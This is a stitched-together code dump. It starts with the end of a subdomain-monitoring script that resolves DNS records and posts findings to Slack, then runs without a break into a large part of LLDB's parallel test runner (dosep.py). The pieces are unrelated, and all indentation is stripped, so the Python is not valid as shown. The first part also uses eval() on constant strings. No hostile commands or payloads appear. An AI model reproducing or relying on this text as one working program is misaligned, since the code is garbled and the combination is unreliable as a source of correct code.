print(colored("\n[!] Performing DNS resolution. Please do not interrupt!", "red"))
for domain in subdomains_to_resolve:
domain = domain.replace('+ ','')
domain = domain.replace('*.','')
dns_results[domain] = {}
try:
for qtype in ['A','CNAME']:
dns_output = dns.resolver.query(domain,qtype, raise_on_no_answer = False)
if dns_output.rrset is None:
pass
elif dns_output.rdtype == 1:
a_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["A"] = a_records
elif dns_output.rdtype == 5:
cname_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["CNAME"] = cname_records
else: pass
except dns.resolver.NXDOMAIN:
pass
except dns.resolver.Timeout:
dns_results[domain]["A"] = eval('["Timed out while resolving."]')
dns_results[domain]["CNAME"] = eval('["Timed out error while resolving."]')
pass
except dns.exception.DNSException:
dns_results[domain]["A"] = eval('["There was an error while resolving."]')
dns_results[domain]["CNAME"] = eval('["There was an error while resolving."]')
pass
if dns_results:
        return posting_to_slack(None, True, dns_results) #Slack the new subdomains along with their DNS output
else:
return posting_to_slack(None, False, None) #Nothing found notification
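# Illustrative shape of the dns_results dictionary built above (values are made
# up for the example); it is handed to posting_to_slack(), which is presumably
# provided by the wildcard import from config:
#
#   {
#       "new.example.com": {"A": ["93.184.216.34"], "CNAME": ["edge.example.net."]},
#       "dead.example.com": {},   # NXDOMAIN or empty answer
#   }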
def multithreading(threads):
global domain_to_monitor
threads_list = []
if not domain_to_monitor:
num = sum(1 for line in open("domains.txt")) #minimum threads executed equals the number of monitored domains
for i in range(max(threads, num)):
if not (q1.empty() and q2.empty()):
t1 = threading.Thread(target = adding_new_domain, args = (q1, ))
t2 = threading.Thread(target = check_new_subdomains, args = (q2, ))
t1.start()
t2.start()
threads_list.append(t1)
threads_list.append(t2)
else:
adding_new_domain(domain_to_monitor)
for t in threads_list:
t.join()
if __name__ == '__main__':
#parse arguments
dns_resolve = parse_args().resolve
#enable_logging = parse_args().logging
list_domains = parse_args().listing
domain_to_monitor = domain_sanity_check(parse_args().target)
domain_to_delete = domain_sanity_check(parse_args().remove_domain)
do_reset = parse_args().reset
#execute the various functions
banner()
reset(do_reset)
remove_domain(domain_to_delete)
domains_listing()
queuing()
multithreading(parse_args().threads)
new_subdomains = compare_files_diff(domain_to_monitor)
# Check if DNS resolution is checked
if not domain_to_monitor:
if (dns_resolve and new_subdomains):
dns_resolution(new_subdomains)
else:
posting_to_slack(new_subdomains, False, None)
else: pass
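# Illustrative invocations (a sketch based on the argparse options above, not
# part of the original script); the file name subscan.py is assumed:
#
#   python subscan.py -u example.com    # add a domain to the monitored list
#   python subscan.py -a                # list all monitored domains
#   python subscan.py -d example.com    # remove a domain from the list
#   python subscan.py -t 30 -r          # check all domains with 30 threads and resolve new subdomains
#   python subscan.py -m                # reset the monitored list and stored output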
dosep.py
"""
Run the test suite using a separate process for each test file.
Each test will run with a time limit of 10 minutes by default.
Override the default time limit of 10 minutes by setting
the environment variable LLDB_TEST_TIMEOUT.
E.g., export LLDB_TEST_TIMEOUT=10m
Override the time limit for individual tests by setting
the environment variable LLDB_[TEST NAME]_TIMEOUT.
E.g., export LLDB_TESTCONCURRENTEVENTS_TIMEOUT=2m
Set to "0" to run without time limit.
E.g., export LLDB_TEST_TIMEOUT=0
or export LLDB_TESTCONCURRENTEVENTS_TIMEOUT=0
To collect core files for timed out tests,
do the following before running dosep.py
OSX
ulimit -c unlimited
sudo sysctl -w kern.corefile=core.%P
Linux:
ulimit -c unlimited
echo core.%p | sudo tee /proc/sys/kernel/core_pattern
"""
from __future__ import absolute_import
from __future__ import print_function
# system packages and modules
import asyncore
import distutils.version
import fnmatch
import multiprocessing
import multiprocessing.pool
import os
import platform
import re
import signal
import sys
import threading
from six import StringIO
from six.moves import queue
# Our packages and modules
import lldbsuite
import lldbsuite.support.seven as seven
from . import configuration
from . import dotest_args
from lldbsuite.support import optional_with
from lldbsuite.test_event import dotest_channels
from lldbsuite.test_event.event_builder import EventBuilder
from lldbsuite.test_event import formatter
from .test_runner import process_control
# Status codes for running command with timeout.
eTimedOut, ePassed, eFailed = 124, 0, 1
g_session_dir = None
g_runner_context = None
output_lock = None
test_counter = None
total_tests = None
test_name_len = None
dotest_options = None
RESULTS_FORMATTER = None
RUNNER_PROCESS_ASYNC_MAP = None
RESULTS_LISTENER_CHANNEL = None
"""Contains an optional function pointer that can return the worker index
for the given thread/process calling it. Returns a 0-based index."""
GET_WORKER_INDEX = None
def setup_global_variables(
lock, counter, total, name_len, options, worker_index_map):
global output_lock, test_counter, total_tests, test_name_len
global dotest_options
output_lock = lock
test_counter = counter
total_tests = total
test_name_len = name_len
dotest_options = options
if worker_index_map is not None:
# We'll use the output lock for this to avoid sharing another lock.
# This won't be used much.
index_lock = lock
def get_worker_index_use_pid():
"""Returns a 0-based, process-unique index for the worker."""
pid = os.getpid()
with index_lock:
if pid not in worker_index_map:
worker_index_map[pid] = len(worker_index_map)
return worker_index_map[pid]
global GET_WORKER_INDEX
GET_WORKER_INDEX = get_worker_index_use_pid
def report_test_failure(name, command, output, timeout):
global output_lock
with output_lock:
if not (RESULTS_FORMATTER and RESULTS_FORMATTER.is_using_terminal()):
print(file=sys.stderr)
print(output, file=sys.stderr)
if timeout:
timeout_str = " (TIMEOUT)"
else:
timeout_str = ""
print("[%s FAILED]%s" % (name, timeout_str), file=sys.stderr)
print("Command invoked: %s" % ' '.join(command), file=sys.stderr)
update_progress(name)
def report_test_pass(name, output):
global output_lock
with output_lock:
update_progress(name)
def update_progress(test_name=""):
global output_lock, test_counter, total_tests, test_name_len
with output_lock:
counter_len = len(str(total_tests))
if not (RESULTS_FORMATTER and RESULTS_FORMATTER.is_using_terminal()):
sys.stderr.write(
"\r%*d out of %d test suites processed - %-*s" %
(counter_len, test_counter.value, total_tests,
test_name_len.value, test_name))
if len(test_name) > test_name_len.value:
test_name_len.value = len(test_name)
test_counter.value += 1
sys.stdout.flush()
sys.stderr.flush()
def parse_test_results(output):
passes = 0
failures = 0
unexpected_successes = 0
for result in output:
pass_count = re.search("^RESULT:.*([0-9]+) passes",
result, re.MULTILINE)
fail_count = re.search("^RESULT:.*([0-9]+) failures",
result, re.MULTILINE)
error_count = re.search("^RESULT:.*([0-9]+) errors",
result, re.MULTILINE)
unexpected_success_count = re.search(
"^RESULT:.*([0-9]+) unexpected successes", result, re.MULTILINE)
if pass_count is not None:
passes = passes + int(pass_count.group(1))
if fail_count is not None:
failures = failures + int(fail_count.group(1))
if unexpected_success_count is not None:
unexpected_successes = unexpected_successes + \
int(unexpected_success_count.group(1))
if error_count is not None:
failures = failures + int(error_count.group(1))
return passes, failures, unexpected_successes
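# Illustrative sketch (not part of the original source): parse_test_results()
# scans inferior output for "RESULT:" summary lines emitted by dotest.py. A
# line shaped roughly like the following (exact wording assumed here) would
# contribute to the totals returned above:
#
#   RESULT: PASSED (8 passes, 0 failures, 0 errors, 0 unexpected successes)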
class DoTestProcessDriver(process_control.ProcessDriver):
"""Drives the dotest.py inferior process and handles bookkeeping."""
def __init__(self, output_file, output_file_lock, pid_events, file_name,
soft_terminate_timeout):
super(DoTestProcessDriver, self).__init__(
soft_terminate_timeout=soft_terminate_timeout)
self.output_file = output_file
self.output_lock = optional_with.optional_with(output_file_lock)
self.pid_events = pid_events
self.results = None
self.file_name = file_name
def write(self, content):
with self.output_lock:
self.output_file.write(content)
def on_process_started(self):
if self.pid_events:
self.pid_events.put_nowait(('created', self.process.pid))
def on_process_exited(self, command, output, was_timeout, exit_status):
if self.pid_events:
# No point in culling out those with no exit_status (i.e.
# those we failed to kill). That would just cause
# downstream code to try to kill it later on a Ctrl-C. At
# this point, a best-effort-to-kill already took place. So
# call it destroyed here.
self.pid_events.put_nowait(('destroyed', self.process.pid))
# Override the exit status if it was a timeout.
if was_timeout:
exit_status = eTimedOut
# If we didn't end up with any output, call it empty for
# stdout/stderr.
if output is None:
output = ('', '')
# Now parse the output.
passes, failures, unexpected_successes = parse_test_results(output)
if exit_status == 0:
# stdout does not have any useful information from 'dotest.py',
# only stderr does.
report_test_pass(self.file_name, output[1])
else:
report_test_failure(
self.file_name,
command,
output[1],
was_timeout)
# Save off the results for the caller.
self.results = (
self.file_name,
exit_status,
passes,
failures,
unexpected_successes)
def on_timeout_pre_kill(self):
# We're just about to have a timeout take effect. Here's our chance
# to do a pre-kill action.
# For now, we look to see if the lldbsuite.pre_kill module has a
# runner for our platform.
module_name = "lldbsuite.pre_kill_hook." + platform.system().lower()
import importlib
try:
module = importlib.import_module(module_name)
except ImportError:
# We don't have one for this platform. Skip.
sys.stderr.write("\nwarning: no timeout handler module: " +
module_name + "\n")
return
# Try to run the pre-kill-hook method.
try:
# Run the pre-kill command.
output_io = StringIO()
module.do_pre_kill(self.pid, g_runner_context, output_io)
# Write the output to a filename associated with the test file and
# pid.
MAX_UNCOMPRESSED_BYTE_COUNT = 10 * 1024
content = output_io.getvalue()
compress_output = len(content) > MAX_UNCOMPRESSED_BYTE_COUNT
basename = "{}-{}.sample".format(self.file_name, self.pid)
sample_path = os.path.join(g_session_dir, basename)
if compress_output:
# Write compressed output into a .zip file.
from zipfile import ZipFile, ZIP_DEFLATED
zipfile = sample_path + ".zip"
with ZipFile(zipfile, "w", ZIP_DEFLATED) as sample_zip:
sample_zip.writestr(basename, content)
else:
# Write raw output into a text file.
with open(sample_path, "w") as output_file:
output_file.write(content)
except Exception as e:
sys.stderr.write("caught exception while running "
"pre-kill action: {}\n".format(e))
return
def is_exceptional_exit(self):
"""Returns whether the process returned a timeout.
Not valid to call until after on_process_exited() completes.
@return True if the exit is an exceptional exit (e.g. signal on
POSIX); False otherwise.
"""
if self.results is None:
raise Exception(
"exit status checked before results are available")
return self.process_helper.is_exceptional_exit(
self.results[1])
def exceptional_exit_details(self):
if self.results is None:
raise Exception(
"exit status checked before results are available")
return self.process_helper.exceptional_exit_details(self.results[1])
def is_timeout(self):
if self.results is None:
raise Exception(
"exit status checked before results are available")
return self.results[1] == eTimedOut
def get_soft_terminate_timeout():
# Defaults to 10 seconds, but can set
# LLDB_TEST_SOFT_TERMINATE_TIMEOUT to a floating point
# number in seconds. This value indicates how long
# the test runner will wait for the dotest inferior to
# handle a timeout via a soft terminate before it will
# assume that failed and do a hard terminate.
# TODO plumb through command-line option
return float(os.environ.get('LLDB_TEST_SOFT_TERMINATE_TIMEOUT', 10.0))
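# For example (a sketch, not part of the original source), a slow machine could
# give the inferior more time to honor a soft terminate with:
#
#   export LLDB_TEST_SOFT_TERMINATE_TIMEOUT=30.0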
def want_core_on_soft_terminate():
# TODO plumb through command-line option
if platform.system() == 'Linux':
return True
else:
return False
def send_events_to_collector(events, command):
"""Sends the given events to the collector described in the command line.
@param events the list of events to send to the test event collector.
@param command the inferior command line which contains the details on
how to connect to the test event collector.
"""
if events is None or len(events) == 0:
# Nothing to do.
return
# Find the port we need to connect to from the --results-port option.
try:
arg_index = command.index("--results-port") + 1
except ValueError:
# There is no results port, so no way to communicate back to
# the event collector. This is not a problem if we're not
# using event aggregation.
# TODO flag as error once we always use the event system
print(
"INFO: no event collector, skipping post-inferior test "
"event reporting")
return
if arg_index >= len(command):
raise Exception(
"expected collector port at index {} in {}".format(
arg_index, command))
event_port = int(command[arg_index])
# Create results formatter connected back to collector via socket.
config = formatter.FormatterConfig()
config.port = event_port
formatter_spec = formatter.create_results_formatter(config)
if formatter_spec is None or formatter_spec.formatter is None:
raise Exception(
"Failed to create socket-based ResultsFormatter "
"back to test event collector")
# Send the events: the port-based event just pickles the content
# and sends over to the server side of the socket.
for event in events:
formatter_spec.formatter.handle_event(event)
# Cleanup
if formatter_spec.cleanup_func is not None:
formatter_spec.cleanup_func()
def send_inferior_post_run_events(
command, worker_index, process_driver, test_filename):
"""Sends any test events that should be generated after the inferior runs.
These events would include timeouts and exceptional (i.e. signal-returning)
process completion results.
@param command the list of command parameters passed to subprocess.Popen().
@param worker_index the worker index (possibly None) used to run
this process
@param process_driver the ProcessDriver-derived instance that was used
to run the inferior process.
@param test_filename the full path to the Python test file that is being
run.
"""
if process_driver is None:
raise Exception("process_driver must not be None")
if process_driver.results is None:
# Invalid condition - the results should have been set one way or
# another, even in a timeout.
raise Exception("process_driver.results were not set")
# The code below fills in the post events struct. If there are any post
# events to fire up, we'll try to make a connection to the socket and
# provide the results.
post_events = []
# Handle signal/exceptional exits.
if process_driver.is_exceptional_exit():
(code, desc) = process_driver.exceptional_exit_details()
post_events.append(
EventBuilder.event_for_job_exceptional_exit(
process_driver.pid,
worker_index,
code,
desc,
test_filename,
command))
# Handle timeouts.
if process_driver.is_timeout():
post_events.append(EventBuilder.event_for_job_timeout(
process_driver.pid,
worker_index,
test_filename,
command))
if len(post_events) > 0:
send_events_to_collector(post_events, command)
def call_with_timeout(
command, timeout, name, inferior_pid_events, test_filename):
# Add our worker index (if we have one) to all test events
# from this inferior.
worker_index = None
if GET_WORKER_INDEX is not None:
try:
worker_index = GET_WORKER_INDEX()
command.extend([
"--event-add-entries",
"worker_index={}:int".format(worker_index)])
except: # pylint: disable=bare-except
# Ctrl-C does bad things to multiprocessing.Manager.dict()
# lookup. Just swallow it.
pass
# Create the inferior dotest.py ProcessDriver.
soft_terminate_timeout = get_soft_terminate_timeout()
want_core = want_core_on_soft_terminate()
process_driver = DoTestProcessDriver(
sys.stdout,
output_lock,
inferior_pid_events,
name,
soft_terminate_timeout)
# Run it with a timeout.
process_driver.run_command_with_timeout(command, timeout, want_core)
# Return the results.
if not process_driver.results:
# This is truly exceptional. Even a failing or timed out
# binary should have called the results-generation code.
raise Exception("no test results were generated whatsoever")
# Handle cases where the test inferior cannot adequately provide
# meaningful results to the test event system.
send_inferior_post_run_events(
command,
worker_index,
process_driver,
test_filename)
return process_driver.results
def process_file(test_file, dotest_argv, inferior_pid_events):
"""Run tests in the specified file in a subprocess and gather the results."""
results = []
base_name = os.path.basename(test_file)
import __main__ as main
global dotest_options
if not dotest_options.p or re.search(dotest_options.p, base_name):
script_file = main.__file__
command = ([sys.executable, script_file] +
dotest_argv +
["-S", dotest_options.session_file_format] +
["--inferior", "-p", base_name, os.path.dirname(test_file)])
timeout_name = os.path.basename(os.path.splitext(base_name)[0]).upper()
timeout = (os.getenv("LLDB_%s_TIMEOUT" % timeout_name) or
getDefaultTimeout(dotest_options.lldb_platform_name))
results.append(call_with_timeout(
command, timeout, base_name, inferior_pid_events, test_file))
# result = (name, status, passes, failures, unexpected_successes)
timed_out = [name for name, status, _, _, _ in results
if status == eTimedOut]
passed = [name for name, status, _, _, _ in results
if status == ePassed]
failed = [name for name, status, _, _, _ in results
if status != ePassed]
unexpected_passes = [
name for name, _, _, _, unexpected_successes in results
if unexpected_successes > 0]
pass_count = sum([result[2] for result in results])
fail_count = sum([result[3] for result in results])
return (
timed_out, passed, failed, unexpected_passes, pass_count, fail_count)
in_q = None
out_q = None
def process_dir_worker_multiprocessing(
a_output_lock, a_test_counter, a_total_tests, a_test_name_len,
a_dotest_options, job_queue, result_queue, inferior_pid_events,
worker_index_map):
"""Worker thread main loop when in multiprocessing mode.
Takes one directory specification at a time and works on it."""
# Shut off interrupt handling in the child process.
signal.signal(signal.SIGINT, signal.SIG_IGN)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# Setup the global state for the worker process.
setup_global_variables(
a_output_lock, a_test_counter, a_total_tests, a_test_name_len,
a_dotest_options, worker_index_map)
# Keep grabbing entries from the queue until done.
while not job_queue.empty():
try:
job = job_queue.get(block=False)
            result = process_file(job[0], job[1], inferior_pid_events)
result_queue.put(result)
except queue.Empty:
# Fine, we're done.
pass
def process_file_worker_multiprocessing_pool(args):
return process_file(*args)
def process_file_worker_threading(job_queue, result_queue, inferior_pid_events):
"""Worker thread main loop when in threading mode.
This one supports the hand-rolled pooling support.
Takes one directory specification at a time and works on it."""
# Keep grabbing entries from the queue until done.
while not job_queue.empty():
try:
job = job_queue.get(block=False)
result = process_file(job[0], job[1], inferior_pid_events)
result_queue.put(result)
except queue.Empty:
# Fine, we're done.
pass
def process_file_worker_threading_pool(args):
return process_file(*args)
def process_file_mapper_inprocess(args):
"""Map adapter for running the subprocess-based, non-threaded test runner.
@param args the process work item tuple
@return the test result tuple
"""
return process_file(*args)
def collect_active_pids_from_pid_events(event_queue):
"""
Returns the set of what should be active inferior pids based on
the event stream.
@param event_queue a multiprocessing.Queue containing events of the
form:
('created', pid)
('destroyed', pid)
@return set of inferior dotest.py pids activated but never completed.
"""
active_pid_set = set()
while not event_queue.empty():
pid_event = event_queue.get_nowait()
if pid_event[0] == 'created':
active_pid_set.add(pid_event[1])
elif pid_event[0] == 'destroyed':
active_pid_set.remove(pid_event[1])
return active_pid_set
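# Illustrative sketch (not part of the original source) of how the event stream
# maps to the returned set:
#
#   ('created', 101), ('created', 102), ('destroyed', 101)  ->  {102}
#
# Only inferiors that were created but never reported as destroyed remain, and
# those are the pids that the kill_all_* helpers below will signal.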
def kill_all_worker_processes(workers, inferior_pid_events):
"""
Kills all specified worker processes and their process tree.
@param workers a list of multiprocess.Process worker objects.
@param inferior_pid_events a multiprocess.Queue that contains
all inferior create and destroy events. Used to construct
the list of child pids still outstanding that need to be killed.
"""
for worker in workers:
worker.terminate()
worker.join()
# Add all the child test pids created.
active_pid_set = collect_active_pids_from_pid_events(
inferior_pid_events)
for inferior_pid in active_pid_set:
print("killing inferior pid {}".format(inferior_pid))
os.kill(inferior_pid, signal.SIGKILL)
def kill_all_worker_threads(workers, inferior_pid_events):
"""
Kills all specified worker threads and their process tree.
@param workers a list of multiprocess.Process worker objects.
@param inferior_pid_events a multiprocess.Queue that contains
all inferior create and destroy events. Used to construct
the list of child pids still outstanding that need to be killed.
"""
# Add all the child test pids created.
active_pid_set = collect_active_pids_from_pid_events(
inferior_pid_events)
for inferior_pid in active_pid_set:
print("killing inferior pid {}".format(inferior_pid))
os.kill(inferior_pid, signal.SIGKILL)
# We don't have a way to nuke the threads. However, since we killed
# all the inferiors, and we drained the job queue, this will be
# good enough. Wait cleanly for each worker thread to wrap up.
for worker in workers:
worker.join()
def find_test_files_in_dir_tree(dir_root):
"""Returns all the test files in the given dir hierarchy.
@param dir_root the path to the directory to start scanning
for test files. All files in this directory and all its children
directory trees will be searched.
"""
for root, _, files in os.walk(dir_root, topdown=False):
def is_test_filename(test_dir, base_filename):
"""Returns True if the given filename matches the test name format.
@param test_dir the directory to check. Should be absolute or
relative to current working directory.
            @param base_filename the base name of the filename to check for
            adherence to the python test case filename format.
@return True if name matches the python test case filename format.
"""
# Not interested in symbolically linked files.
if os.path.islink(os.path.join(test_dir, base_filename)):
return False
# Only interested in test files with the "Test*.py" naming pattern.
return (base_filename.startswith("Test") and
base_filename.endswith(".py"))
for f in files:
if is_test_filename(root, f):
yield os.path.join(root, f)
def initialize_global_vars_common(num_threads, test_work_items, session_dir,
runner_context):
global g_session_dir, g_runner_context, total_tests, test_counter
global test_name_len
total_tests = len(test_work_items)
test_counter = multiprocessing.Value('i', 0)
test_name_len = multiprocessing.Value('i', 0)
g_session_dir = session_dir
g_runner_context = runner_context
if not (RESULTS_FORMATTER and RESULTS_FORMATTER.is_using_terminal()):
print(
"Testing: %d test suites, %d thread%s" %
(total_tests,
num_threads,
(num_threads > 1) *
"s"),
file=sys.stderr)
update_progress()
def initialize_global_vars_multiprocessing(num_threads, test_work_items,
session_dir, runner_context):
# Initialize the global state we'll use to communicate with the
# rest of the flat module.
global output_lock
output_lock = multiprocessing.RLock()
initialize_global_vars_common(num_threads, test_work_items, session_dir,
runner_context)
def initialize_global_vars_threading(num_threads, test_work_items, session_dir,
runner_context):
"""Initializes global variables used in threading mode.
@param num_threads specifies the number of workers used.
@param test_work_items specifies all the work items
that will be processed.
    @param session_dir the session directory where test-run-specific files are
written.
@param runner_context a dictionary of platform-related data that is passed
to the timeout pre-kill hook.
"""
# Initialize the global state we'll use to communicate with the
# rest of the flat module.
global output_lock
output_lock = threading.RLock()
index_lock = threading.RLock()
index_map = {}
def get_worker_index_threading():
"""Returns a 0-based, thread-unique index for the worker thread."""
thread_id = threading.current_thread().ident
with index_lock:
if thread_id not in index_map:
index_map[thread_id] = len(index_map)
return index_map[thread_id]
global GET_WORKER_INDEX
GET_WORKER_INDEX = get_worker_index_threading
initialize_global_vars_common(num_threads, test_work_items, session_dir,
runner_context)
def ctrl_c_loop(main_op_func, done_func, ctrl_c_handler):
"""Provides a main loop that is Ctrl-C protected.
The main loop calls the main_op_func() repeatedly until done_func()
returns true. The ctrl_c_handler() method is called with a single
int parameter that contains the number of times the ctrl_c has been
hit (starting with 1). The ctrl_c_handler() should mutate whatever
it needs to have the done_func() return True as soon as it is desired
to exit the loop.
"""
done = False
ctrl_c_count = 0
while not done:
try:
# See if we're done. Start with done check since it is
# the first thing executed after a Ctrl-C handler in the
# following loop.
done = done_func()
if not done:
# Run the main op once.
main_op_func()
except KeyboardInterrupt:
ctrl_c_count += 1
ctrl_c_handler(ctrl_c_count)
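# Minimal usage sketch for ctrl_c_loop() (hypothetical names, not part of the
# original source):
#
#   state = {"done": False}
#   ctrl_c_loop(
#       lambda: do_one_unit_of_work(state),              # main_op_func
#       lambda: state["done"],                           # done_func
#       lambda count: state.update(done=(count >= 2)))   # ctrl_c_handler
#
# The concrete runners below wire these three callables to
# pump_workers_and_asyncore_map, workers_and_async_done and handle_ctrl_c.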
def pump_workers_and_asyncore_map(workers, asyncore_map):
"""Prunes out completed workers and maintains the asyncore loop.
The asyncore loop contains the optional socket listener
and handlers. When all workers are complete, this method
takes care of stopping the listener. It also runs the
asyncore loop for the given async map for 10 iterations.
@param workers the list of worker Thread/Process instances.
@param asyncore_map the asyncore threading-aware map that
indicates which channels are in use and still alive.
"""
# Check on all the workers, removing them from the workers
# list as they complete.
dead_workers = []
for worker in workers:
# This non-blocking join call is what allows us
# to still receive keyboard interrupts.
worker.join(0.01)
if not worker.is_alive():
dead_workers.append(worker)
# Clear out the completed workers
for dead_worker in dead_workers:
workers.remove(dead_worker)
# If there are no more workers and there is a listener,
# close the listener.
global RESULTS_LISTENER_CHANNEL
if len(workers) == 0 and RESULTS_LISTENER_CHANNEL is not None:
RESULTS_LISTENER_CHANNEL.close()
RESULTS_LISTENER_CHANNEL = None
# Pump the asyncore map if it isn't empty.
if len(asyncore_map) > 0:
asyncore.loop(0.1, False, asyncore_map, 10)
def handle_ctrl_c(ctrl_c_count, job_queue, workers, inferior_pid_events,
stop_all_inferiors_func):
"""Performs the appropriate ctrl-c action for non-pool parallel test runners
@param ctrl_c_count starting with 1, indicates the number of times ctrl-c
has been intercepted. The value is 1 on the first intercept, 2 on the
second, etc.
@param job_queue a Queue object that contains the work still outstanding
(i.e. hasn't been assigned to a worker yet).
@param workers list of Thread or Process workers.
@param inferior_pid_events specifies a Queue of inferior process
construction and destruction events. Used to build the list of inferior
processes that should be killed if we get that far.
@param stop_all_inferiors_func a callable object that takes the
workers and inferior_pid_events parameters (in that order) if a hard
stop is to be used on the workers.
"""
# Print out which Ctrl-C we're handling.
key_name = [
"first",
"second",
"third",
"many"]
if ctrl_c_count < len(key_name):
name_index = ctrl_c_count - 1
else:
name_index = len(key_name) - 1
message = "\nHandling {} KeyboardInterrupt".format(key_name[name_index])
with output_lock:
print(message)
if ctrl_c_count == 1:
# Remove all outstanding items from the work queue so we stop
# doing any more new work.
while not job_queue.empty():
try:
# Just drain it to stop more work from being started.
job_queue.get_nowait()
except queue.Empty:
pass
with output_lock:
print("Stopped more work from being started.")
elif ctrl_c_count == 2:
# Try to stop all inferiors, even the ones currently doing work.
stop_all_inferiors_func(workers, inferior_pid_events)
else:
with output_lock:
print("All teardown activities kicked off, should finish soon.")
def workers_and_async_done(workers, async_map):
"""Returns True if the workers list and asyncore channels are all done.
@param workers list of workers (threads/processes). These must adhere
to the threading Thread or multiprocessing.Process interface.
@param async_map the threading-aware asyncore channel map to check
for live channels.
@return False if the workers list exists and has any entries in it, or
if the async_map exists and has any entries left in it; otherwise, True.
"""
if workers is not None and len(workers) > 0:
# We're not done if we still have workers left.
return False
if async_map is not None and len(async_map) > 0:
return False
# We're done.
return True
def multiprocessing_test_runner(num_threads, test_work_items, session_dir,
runner_context):
"""Provides hand-wrapped pooling test runner adapter with Ctrl-C support.
This concurrent test runner is based on the multiprocessing
library, and rolls its own worker pooling strategy so it
can handle Ctrl-C properly.
This test runner is known to have an issue running on
Windows platforms.
@param num_threads the number of worker processes to use.
@param test_work_items the iterable of test work item tuples
to run.
    @param session_dir the session directory where test-run-specific files are
written.
@param runner_context a dictionary of platform-related data that is passed
to the timeout pre-kill hook.
"""
# Initialize our global state.
initialize_global_vars_multiprocessing(num_threads, test_work_items,
session_dir, runner_context)
# Create jobs.
job_queue = multiprocessing.Queue(len(test_work_items))
for test_work_item in test_work_items:
job_queue.put(test_work_item)
result_queue = multiprocessing.Queue(len(test_work_items))
# Create queues for started child pids. Terminating
# the multiprocess processes does not terminate the
# child processes they spawn. We can remove this tracking
# if/when we move to having the multiprocess process directly
# perform the test logic. The Queue size needs to be able to
# hold 2 * (num inferior dotest.py processes started) entries.
inferior_pid_events = multiprocessing.Queue(4096)
# Worker dictionary allows each worker to figure out its worker index.
manager = multiprocessing.Manager()
worker_index_map = manager.dict()
# Create workers. We don't use multiprocessing.Pool due to
# challenges with handling ^C keyboard interrupts.
workers = []
for _ in range(num_threads):
worker = multiprocessing.Process(
target=process_file_worker_multiprocessing,
args=(output_lock,
test_counter,
total_tests,
test_name_len,
dotest_options,
job_queue,
result_queue,
inferior_pid_events,
worker_index_map))
worker.start()
workers.append(worker)
# Main loop: wait for all workers to finish and wait for
# the socket handlers to wrap up.
ctrl_c_loop(
# Main operation of loop
lambda: pump_workers_and_asyncore_map(
workers, RUNNER_PROCESS_ASYNC_MAP),
# Return True when we're done with the main loop.
lambda: workers_and_async_done(workers, RUNNER_PROCESS_ASYNC_MAP),
# Indicate what we do when we receive one or more Ctrl-Cs.
lambda ctrl_c_count: handle_ctrl_c(
ctrl_c_count, job_queue, workers, inferior_pid_events,
kill_all_worker_processes))
# Reap the test results.
test_results = []
while not result_queue.empty():
test_results.append(result_queue.get(block=False))
return test_results
def map_async_run_loop(future, channel_map, listener_channel):
"""Blocks until the Pool.map_async completes and the channel completes.
@param future an AsyncResult instance from a Pool.map_async() call.
@param channel_map the asyncore dispatch channel map that should be pumped.
Optional: may be None.
@param listener_channel the channel representing a listener that should be
closed once the map_async results are available.
@return the results from the async_result instance.
"""
map_results = None
done = False
while not done:
# Check if we need to reap the map results.
if map_results is None:
if future.ready():
# Get the results.
map_results = future.get()
# Close the runner process listener channel if we have
# one: no more connections will be incoming.
if listener_channel is not None:
listener_channel.close()
# Pump the asyncore loop if we have a listener socket.
if channel_map is not None:
asyncore.loop(0.01, False, channel_map, 10)
# Figure out if we're done running.
done = map_results is not None
if channel_map is not None:
# We have a runner process async map. Check if it
# is complete.
if len(channel_map) > 0:
# We still have an asyncore channel running. Not done yet.
done = False
return map_results
def multiprocessing_test_runner_pool(num_threads, test_work_items, session_dir,
runner_context):
# Initialize our global state.
initialize_global_vars_multiprocessing(num_threads, test_work_items,
session_dir, runner_context)
manager = multiprocessing.Manager()
worker_index_map = manager.dict()
pool = multiprocessing.Pool(
num_threads,
initializer=setup_global_variables,
initargs=(output_lock, test_counter, total_tests, test_name_len,
dotest_options, worker_index_map))
# Start the map operation (async mode).
map_future = pool.map_async(
process_file_worker_multiprocessing_pool, test_work_items)
return map_async_run_loop(
map_future, RUNNER_PROCESS_ASYNC_MAP, RESULTS_LISTENER_CHANNEL)
def threading_test_runner(num_threads, test_work_items, session_dir,
runner_context):
"""Provides hand-wrapped pooling threading-based test runner adapter
with Ctrl-C support.
This concurrent test runner is based on the threading
library, and rolls its own worker pooling strategy so it
can handle Ctrl-C properly.
@param num_threads the number of worker processes to use.
@param test_work_items the iterable of test work item tuples
to run.
    @param session_dir the session directory where test-run-specific files are
written.
@param runner_context a dictionary of platform-related data that is passed
to the timeout pre-kill hook.
"""
# Initialize our global state.
initialize_global_vars_threading(num_threads, test_work_items, session_dir,
runner_context)
# Create jobs.
job_queue = queue.Queue()
for test_work_item in test_work_items:
job_queue.put(test_work_item)
result_queue = queue.Queue()
# Create queues for started child pids. Terminating
# the threading threads does not terminate the
# child processes they spawn.
inferior_pid_events = queue.Queue()
    # Create workers. We don't use multiprocessing.pool.ThreadPool
# due to challenges with handling ^C keyboard interrupts.
workers = []
for _ in range(num_threads):
worker = threading.Thread(
target=process_file_worker_threading,
args=(job_queue,
result_queue,
inferior_pid_events))
worker.start()
workers.append(worker)
# Main loop: wait for all workers to finish and wait for
# the socket handlers to wrap up.
ctrl_c_loop(
# Main operation of loop
lambda: pump_workers_and_asyncore_map(
workers, RUNNER_PROCESS_ASYNC_MAP),
# Return True when we're done with the main loop.
lambda: workers_and_async_done(workers, RUNNER_PROCESS_ASYNC_MAP),
# Indicate what we do when we receive one or more Ctrl-Cs.
lambda ctrl_c_count: handle_ctrl_c(
ctrl_c_count, job_queue, workers, inferior_pid_events,
kill_all_worker_threads))
# Reap the test results.
test_results = []
while not result_queue.empty():
test_results.append(result_queue.get(block=False))
return test_results
def threading_test_runner_pool(num_threads, test_work_items, session_dir,
runner_context):
# Initialize our global state.
initialize_global_vars_threading(num_threads, test_work_items, session_dir,
runner_context)
pool = multiprocessing.pool.ThreadPool(num_threads)
map_future = pool.map_async(
process_file_worker_threading_pool, test_work_items)
return map_async_run_loop(
map_future, RUNNER_PROCESS_ASYNC_MAP, RESULTS_LISTENER_CHANNEL)
def asyncore_run_loop(channel_map):
try:
asyncore.loop(None, False, channel_map)
except:
# Swallow it, we're seeing:
# error: (9, 'Bad file descriptor')
# when the listener channel is closed. Shouldn't be the case.
pass
